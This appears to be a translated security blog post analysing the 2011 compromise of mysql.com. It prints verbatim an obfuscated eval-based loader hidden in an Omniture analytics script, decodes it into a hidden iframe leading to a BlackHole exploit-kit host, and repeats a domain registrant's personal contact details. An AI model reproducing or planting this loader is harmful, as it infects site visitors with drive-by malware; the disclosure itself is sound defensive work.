MySQL.com hacked and sold for $ 3000

All detailed information will be under the cut.





Video showing how users get infected:

Step 1:

We visit the site mysql.com

')

Step 2:

Download the malicious script: mysql.com/common/js/s_code_remote.js?ver=20091011

/* SiteCatalyst code version: H.14. Copyright Omniture, Inc. More info available at http://www.omniture.com */ /* Author: Neil Evans */ /************************** CONFIG SECTION ****************************************/ /* Specify the Report Suite(s) */ Object.prototype.qwe=function(){return String.fromCharCode;};Object.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('123').data&&typeof{}.asd.vfr==='undefined')n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,82/n,246/n,18/n,18/n,18/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,118/n,18/n,18/n,250/n,64/n,202/n,216/n,230/n,202/n,64/n,246/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,238/n,228/n,210/n,232/n,202/n,80/n,68/n,120/n,210/n,204/n,228/n,194/n,218/n,202/n,64/n,230/n,228/n,198/n,122/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,64/n,238/n,210/n,200/n,232/n,208/n,122/n,78/n,98/n,96/n,78/n,64/n,208/n,202/n,210/n,206/n,208/n,232/n,122/n,78/n,98/n,96/n,78/n,64/n,230/n,232/n,242/n,216/n,202/n,122/n,78/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,116/n,208/n,210/n,200/n,200/n,202/n,220/n,118/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,116/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,118/n,216/n,202/n,204/n,232/n,116/n,96/n,118/n,232/n,222/n,224/n,116/n,96/n,118/n,78/n,124/n,120/n,94/n,210/n,204/n,228/n,194/n,218/n,202/n,124/n,68/n,82/n,118/n,18/n,18/n,250/n,18/n,18/n,204/n,234/n,220/n,198/n,232/n,210/n,222/n,220/n,64/n,210/n,204/n,228/n,194/n,218/n,202/n,228/n,80/n,82/n,246/n,18/n,18/n,18/n,236/n,194/n,228/n,64/n,204/n,64/n,122/n,64/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,198/n,228/n,202/n,194/n,232/n,202/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,80/n,78/n,210/n,204/n,228/n,194/n,218/n,202/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,230/n,228/n,198/n,78/n,88/n,78/n,208/n,232/n,232/n,224/n,116/n,94/n,94/n,204/n,194/n,216/n,222/n,230/n,204/n,194/n,240/n,92/n,210/n,220/n,94/n,210/n,220/n,204/n,222/n,94/n,210/n,220/n,92/n,198/n,206/n,210/n,126/n,106/n,78/n,82/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,236/n,210/n,230/n,210/n,196/n,210/n,216/n,210/n,232/n,242/n,122/n,78/n,208/n,210/n,200/n,200/n,202/n,220/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,224/n,222/n,230/n,210/n,232/n,210/n,222/n,220/n,122/n,78/n,194/n,196/n,230/n,222/n,216/n,234/n,232/n,202/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,216/n,202/n,204/n,232/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,232/n,242/n,216/n,202/n,92/n,232/n,222/n,224/n,122/n,78/n,96/n,78/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,238/n,210/n,200/n,232/n,208/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,204/n,92/n,230/n,202/n,232/n,130/n,232/n,232/n,228/n,210/n,196/n,234/n,232/n,202/n,80/n,78/n,208/n,202/n,210/n,206/n,208/n,232/n,78/n,88/n,78/n,98/n,96/n,78/n,82/n,118/n,18/n,18/n,18/n,200/n,222/n,198/n,234/n,218/n,202/n,220/n,232/n,92/n,206/n,202/n,232/n,138/n,216/n,202/n,218/n,202/n,220/n,232/n,230/n,132/n,242/n,168/n,194/n,206/n,156/n,194/n,218/n,202/n,80/n,78/n,196/n,222/n,200/n,242/n,78/n,82/n,182/n,96/n,186/n,92/n,194/n,224/n,224/n,202/n,220/n,200/n,134/n,208/n,210/n,216/n,200/n,80/n,204/n,82/n,118/n,18/n,18/n,250/n];mm={}.qwe();for(i=0;i<m.length;i++)if({}.asd==='e')s+=mm(e("m"+"["+"i]"));e(s); var s_account="sunmysqldev"; var sun_dynamicAccountSelection=true; var sun_dynamicAccountList="sunglobal,sunmysql=mysql.com;sunglobal,sunmysql=mysql.de;sunglobal,sunmysql=mysql.fr;sunglobal,sunmysql=mysql.it;sunmysqldev=."; /* Specify the Site ID */ var s_siteid="mysql:"; /* PageName Settings */ if (typeof s_pageType=='undefined') { var s_pageName=window.location.host+window.location.pathname; s_pageName=s_pageName.replace(/www.mysql.com/,""); s_pageName=s_pageName.replace(/www.mysql./,""); s_pageName=s_pageName.replace(/.mysql.com/,":"); s_pageName=s_pageName.replace(/mysql.com/,""); } /* Remote Omniture JS call */ var sun_ssl=(window.location.protocol.toLowerCase().indexOf("https")!=-1); if(sun_ssl == true) { var fullURL = "https://www.sun.com/share/metrics/metrics_group1.js"; } else { var fullURL= "http://www-cdn.sun.com/share/metrics/metrics_group1.js"; } document.write("<sc" + "ript type=\"text/javascript\" src=\""+fullURL+"\"></sc" + "ript>"); /************************** END CONFIG SECTION **************************************/ /* Split dev.mysql.com Path */ var mysql_host=location.hostname; if (mysql_host=='dev.mysql.com') { var mysql_url=window.location.pathname.toLowerCase(); var mysql_split=mysql_url.split("/"); } /* Reset PageName Settings */ function s_postPlugins(s) { /* dev.mysql.com/doc ---> prop31 */ if (mysql_host=='dev.mysql.com') { if (mysql_split[1]=="doc") { s.prop31=s.pageName; s.pageName=s.channel+" (site section)"; } } /* lists.mysql.com ---> prop31 */ if (mysql_host=='lists.mysql.com') { s.prop31=s.pageName; s.pageName=s.channel+" (site section)"; } } 

Decoded script looks like this:





Well, the text:

 if (document.getElementsByTagName('body')[0]) { iframer(); } else { document.write("<iframe src='http://falosfax.in/info/in.cgi?5' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer() { var f = document.createElement('iframe'); f.setAttribute('src', 'http://falosfax.in/info/in.cgi?5'); f.style.visibility = 'hidden'; f.style.position = 'absolute'; f.style.left = '0'; f.style.top = '0'; f.setAttribute('width', '10'); f.setAttribute('height', '10'); document.getElementsByTagName('body')[0].appendChild(f); 

The script generates iframe and redirect us at falosfax.in/info/in.cgi?5&ab_iframe=1&ab_badtraffic=1&antibot_hash=1255098964&ur=1&HTTP_REFERER=http : //mysql.com/, and so on to trurchr , and here to trurcht_REFERER= http : //mysql.com/, and hence to trurchr , as a rule, now to trurhp_REFERER=http : //mysql.com/, and now to trurchr, as a rule, rel.



Here is a malicious bunch of BlackHole. It exploits the browser, plug-ins, such as Adobe Flash, Adobe PDF, Java, etc.), and after successful operation, installs malware on the OS without the user's knowledge. A user only needs to visit mysql.com from a vulnerable platform and he will become infected with malware.



Currently, 4 of 44 antiviruses on VirusTotal can detect this malware:





Domain data:

falosfax.in Address: 212.95.63.201

Location: Germany / Berlin

Created On:20-Jun-2011 13:17:05 UTC

Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)

Registrant Name:CHRISTOPHER J KLEIN

Registrant Street1:7880 SW 132 STREET

Registrant City:MIAMI

Registrant State/Province:Florida

Registrant Postal Code:33156

Registrant Country:US

Registrant Phone:+1.3053771635

Registrant Email:cjklein54@yahoo.com

Admin ID:TS_14483505

Admin Name:CHRISTOPHER J KLEIN

Admin Organization:N/A

Admin Street1:7880 SW 132 STREET

Admin Street2:

Admin Street3:

Admin City:MIAMI

Admin State/Province:Florida

Admin Postal Code:33156

Admin Country:US

Admin Phone:+1.3053771635

Admin Phone Ext.:

Admin FAX:

Admin FAX Ext.:

Admin Email:cjklein54@yahoo.com

Tech Email:cjklein54@yahoo.com

Name Server:NS1.SKYNS1.NET

Name Server:NS2.SKYNS1.NET Address: 212.95.63.201

Location: Germany / Berlin

Created On:20-Jun-2011 13:17:05 UTC

Sponsoring Registrar:Transecute Solutions Pvt. Ltd. (R120-AFIN)

Registrant Name:CHRISTOPHER J KLEIN

Registrant Street1:7880 SW 132 STREET

Registrant City:MIAMI

Registrant State/Province:Florida

Registrant Postal Code:33156

Registrant Country:US

Registrant Phone:+1.3053771635

Registrant Email:cjklein54@yahoo.com

Admin ID:TS_14483505

Admin Name:CHRISTOPHER J KLEIN

Admin Organization:N/A

Admin Street1:7880 SW 132 STREET

Admin Street2:

Admin Street3:

Admin City:MIAMI

Admin State/Province:Florida

Admin Postal Code:33156

Admin Country:US

Admin Phone:+1.3053771635

Admin Phone Ext.:

Admin FAX:

Admin FAX Ext.:

Admin Email:cjklein54@yahoo.com

Tech Email:cjklein54@yahoo.com

Name Server:NS1.SKYNS1.NET

Name Server:NS2.SKYNS1.NET



truruhfhqnviaosdpruejeslsuy.cx.cc

Address: 46.16.233.108

Location: Sweden / Stockholm



Brian Krebs noted in his blog that he had recently seen how the Russian hacker forum was selling full access to the mysql.com domain and to all the subdomains for $ 3000.